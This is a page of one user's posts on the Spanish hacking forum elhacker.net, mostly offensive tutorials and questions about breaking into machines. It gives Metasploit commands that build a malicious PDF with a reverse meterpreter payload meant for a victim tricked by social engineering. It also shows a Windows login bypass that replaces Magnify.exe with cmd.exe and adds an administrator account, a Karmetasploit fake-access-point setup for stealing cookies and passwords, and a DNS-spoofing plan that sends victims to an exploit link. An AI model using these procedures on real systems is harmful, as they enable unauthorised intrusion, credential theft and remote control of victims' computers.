elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Seguridad Informática / Hacking / Re: Dudas sobre armitage, vulnerabilidades y linux en: 19 Abril 2014, 02:16 am
Cuando escaneo la maquina que tiene linux con nmap me sale esto

Código:
# Nmap 5.00 scan initiated Fri Apr 18 19:19:45 2014 as: nmap -sV -p1-65535 192.168.1.10 
Interesting ports on root (127.0.0.1):
Not shown: 65530 closed ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.2.16 ((Debian))
631/tcp  open  ipp        CUPS 1.4
1314/tcp open  speech     Festival Speech Synthesis System
3128/tcp open  http-proxy Tinyproxy 1.8.2
5432/tcp open  postgresql PostgreSQL DB (Spanish)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Fri Apr 18 19:19:58 2014 -- 1 IP address (1 host up) scanned in 13.21 seconds

y no se que exploit me sirva para los servivios que esta corriendo
12  Seguridad Informática / Hacking / Re: como instalar un programa en: 18 Abril 2014, 07:56 am
lo que quieres es crakear el programa, esa pregunta te recomiendo que la hagas en ingenieria inversa en la sección de programacion
13  Seguridad Informática / Hacking / Re: como puedo entrar en un pc con un pendrive en: 18 Abril 2014, 07:43 am
No entiendo tu pregunta, si quieres bootear un sistema operativo desde un pendrive, lo que tienes que hacer es meterte en la BIOS y buscar la configuracion de boot, en una parte te tiene que salir algo como prioridades de de boot, ahi seleccionas de primero la unidad usb y luego el discoduro, sales guardas y listo, el sistema operativo que esta en el pendrive tiene que cargar los drivers de tu hardware.

si a eso te refieres
14  Seguridad Informática / Hacking / [AYUDA] Esto funcionaria ? en: 17 Abril 2014, 07:35 am
uso el exploit ms11_040_netapi para internet explore, ese exploit me genera la direccion de enlace que seria por ejemplo http://192.168.1.10:8080/kjhTFC8o9 para yo tener acceso a la pc remota, el tiene que poner esa direccion en su internet explorer.

pero..... si yo hago un dns spoofing con ettercap de la siguiente manera:

Código:
google.com        A        http://192.168.1.10:8080/kjhTFC8o9
*.google.com      A        http://192.168.1.10:8080/kjhTFC8o9
www.google.com    PTR    http://192.168.1.10:8080/kjhTFC8o9

la victima cuando vaya a entrar a google entrara a mi link y me regala una linda sesión de meterpreter ?????
15  Seguridad Informática / Hacking / Dudas sobre armitage, vulnerabilidades y linux en: 17 Abril 2014, 06:59 am
A ver tengo un par de dudas sobre unas cosillas.

     tengo una pc que usa linux (Debian), quise entrar a ella usando armitage pero me di cuenta de que solo esta corriendo un servivio que es http en el puerto 80, como puedo entrar a ella ? usando hackin avanzado porque de manera basica ya se

    de forma etica como podria desde armitaje entrar a una pc que usa windows 7 u 8 sin usar el exploit ms11_040_netapi de internet explorer, que exploit explota una vulnerabilidad comun en win 7?



   
16  Seguridad Informática / Hacking / Re: Entrar a cuenta de Windows 7 saltando la contraseña en: 6 Abril 2014, 17:13 pm
Tienes razón
Y ahora pregunto (como duda constructiva) qué tiene de beneficio el crear de esa forma una cuenta cuando ya (mediante el live cd) has tenido acceso completo al disco duro y al pc?

pero también puedes cambiar la contraseña del usuario. la utilidad que le veo es solo para bromearle a alguien cambiándole su contraseña de usuario porque como ya dijiste desde el liveCD ya tienes acceso al discoduro
17  Seguridad Informática / Hacking / Explotando Windows 7 o XP mediante PDF desde metasploit en: 6 Abril 2014, 05:39 am
El siguiente post es solo con fines EDUCATIVOS, cualquier uso malintencionado del mismo es responsabilidad entera de cada uno.

En la actualidad como mucho de nosotros sabemos, la mayoría de las personas optan por usar el famosillo Sistema Operativo Windows, ya sea XP - 7 o la nueva que se lanzo hace poco el Windows 8, entonces es lógico que si usan Windows es por cosas de trabajo, estudio, diversión  etc.

También es de conocimiento que Windows actualmente es vulnerable a cualquier ataque cibernetico, ya sea mediante exploits, vulnerabilidades, troyanos, etc, es por ello que muchos preferimos usar cualquier otro sistema que no sea Windows.

Pero ustedes se preguntaran ¿Porque Windows es tan Vulnerable?... Pues, porque nosotros mismos lo hacemos vulnerable!!! entonces ustedes dirán !Joder que Coña! si mis Firewall, Antivirus están actualizados! ... pues eso no tiene nada que ver, porque el sistema es explotado mediante las vulnerabilidades que tienen los programas que acostumbran a instalar diariamente, por ejemplo el  Adobe PDF, Microsoft Word, Ares, Reproductor de Windows, Winamp, VLC u otros, ¿Por que creen que las empresas actualizan sus Softwares (programas que usamos) semanalmente?... Porque, no es porque les guste... es con el fin de parchear las vulnerabilidades que se presentan diariamente en estos programas, y así "ayudan" a que el sistema sea un poco "seguro".


En este tutorial voy a demostrar como aprovecharnos de las vulnerabilidades que se presentan en los programas que tienen instalado un Sistema Operativo Windows 7 o XP, para asi tener el control total del sistema.

Para tal caso utilizare la vulnerabilidad Adobe PDF Escape EXE Social Engineering (No javascript) ya que casi el 95% (quizá) de los usuarios de Windows tienen instalado el Adobe Acrobat ya sea en su ordenador o notebook.

REQUERIMIENTOS:

    Backtrack 5 R1 - R2 o R3 (Atacante)
    Metasploit Framework (Atacante)
    Windows XP - 7 (Victima)
    Adobe Reader 9.1 (Victima)



PROCEDIMIENTOS:

Lo primero que tenemos que hacer es crear el PDF malicioso desde el Metasploit, dicho archivo sera enviado a nuestra victima usando Ing. Social para que logre abrirlo y así obtener acceso a su sistema.

Abrimos el Metasploit y tecleamos los siguientes comandos:

Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp                 (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf                         (Creara el archivo PDF malicioso)
set lhost 192.168.1.17                                                         (IP del Atacante)
set lport 8080                                                                       (Puerto open de la Victima)
exploit



Después de haber generado el PDF malicioso con los comandos mencionados, se almacenera en la carpeta /root/.msf4/local/ si no logras ver la carpeta /.msf4/ teclea Ctrl+H y observeras dicha carpeta.

El siguiente paso es enviar el PDF malicioso generado a nuestra victima, ya sea por e-mail, link de descarga u otros métodos que se nos pueda ocurrir (Ing. Social).

Si logramos que nuestra victima acepte dicho archivo, inmediatamente abrimos nuevamente el Metasploit en otra consola para generar la conexión que recibiremos cuando la victima ejecute el PDF, ejecutando los siguientes comandos:

Código:
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.1.17 
exploit



Cuando la victima ejecuta el PDF malicioso, Adobe Acrobat le mostrara un mensaje preguntándole si desea ejecutar el archivo, como indica la siguiente imagen:



Después de que la victima haga clic en "Abrir" automáticamente recibiremos la conexión inversa en nuestra consola del Metasploit, tal cual se muestra en la siguiente imagen:



listo ahora solo escribimos help y vemos los comandos que podemos ejecutar

18  Seguridad Informática / Hacking / Entrar a cuenta de Windows 7 saltando la contraseña en: 6 Abril 2014, 05:22 am
Este es un método para entrar en sistemas Windows un poco antiguo y bastante sencillote y agresivo. Sin embargo, a lo largo de las versiones de Windows no han parcheado nunca y, de hecho, poca documentación es la que he encontrado al respecto.

Normalmente, para entrar en una máquina Windows sin tener autorización para ello, era necesario saber las contraseñas, ya sean del usuario o de administrador, esto se hacía “a mano” o con distribuciones de Linux especificas y con la ayuda de alguna tabla Rainbow. Otra forma era utilizar Kon-Boot para parchear el proceso de autenticación en memoria.

A continuación, se explicará una forma de poder crear un usuario administrador, sin haber tenido que acceder con algún usuario que ya fuera administrador de la máquina anteriormente.

Todos sabemos que Windows está especialmente concienciado con las opcines de accesibilidad, teniendo en cuenta por ejemplo, a la personas con dificultades para leer bien, por lo que incluso al hacer el login ya te da la opción de usar las utilidades para ayudar a estas personas.



Por lógica, esto es un programa que te busca el cursor y todo lo que tenga alrededor lo hace mas grande. Sin embargo, pensando cómo es Windows o en general cualquier sistema operativo, todo programa estará asociado a una cuenta que sea la que lo haya ejecutado. Pero...¿Qué cuenta lo ejecuta si ni hemos puesto la contraseña de la nuestra? Por lógica debería de ser uno con privilegios mínimos.

Vamos a probar....

1º Descargamos alguna distribución Linux en pendrive como Ubuntu o sucedáneos o algún bartpc.
2º Arrancamos desde ese usb y montamos al partición de windows.
3º Nos vamos a la ruta C:\Windows\System32
4º Nos hacemos una copia de seguridad del fichero Magnify.exe.



5º Borramos o renombramos el fichero Magnify.exe.
6º Copiamos el fichero cmd.exe y lo cambiamos de nombre a Magnify.exe




7º Reiniciamos el ordenador y dejamos que arranque Windows.



8º Volvemos a ejecutar la herramienta de lupa



Ahora se nos abrira una shell como administrador donde crearemos un usuario llamado test cpn la siguiente linea de comandos

Código:
net user /add test2
net localgroup administrators test2 /add
net user test2 *



y listo  ;D
19  Seguridad Informática / Hacking / Karmetasploit en: 31 Marzo 2014, 00:17 am
                                       

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos Karmetasploit

Instalamos dhcpd3-server

Código:
sudo apt-get install isc-dhcp-server

Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

Código:
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.
 
Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0

Código:
airmon-ng start wlan0

Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

Código:
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up

Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

Código:
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0

Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

Código:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Ahora iniciamos mestasploit con karma.

Código:
msfconsole -r karma.rc

Al iniciar karmetasploit les aparecerá:

20  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Como liberar un modem de pendrive en: 6 Marzo 2014, 06:10 am
Hola, en mi país hay redes que van mas rápido que otras, como sucede en casi todo el mundo. yo compre un modem Digitel pero es mucho mas lento que el Movistar así que les voy a enseñar como liberar modems de pendrive por si tienen el mismo problema...


Para esto necesitaremos:

  • Un modem de pendrive
  • DC-unloker que lo pueden descargar de aqui https://www.dc-unlocker.com/downloads

    Empecemos...


    1. Conecta tu Módem al computador con el SIM de la compañia que queremos usar.

    2. Abra el DC unlocker.

    3. Seleccione el fabricante del dispositivo que desea desbloquear. en mi caso, seleccione "ZTE datacards".

    4. Haga clic en el icono de búsqueda para detectar el dispositivo.



    5. Seleccione ficha "Unlocking" para ver los detalles del modem.

    6. Ahora haga clic en "Unlock". esperar durante unos pocos segundos. Si el proceso se ha realizado correctamente, debería decir algo como "Unlocking sucefull"



    7. Instalar el gestor de Conexiones y configurar los ajustes en función de la configuración de país proveedor de la red y listo



    Esto ha sido todo espero les funcione  ;D
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines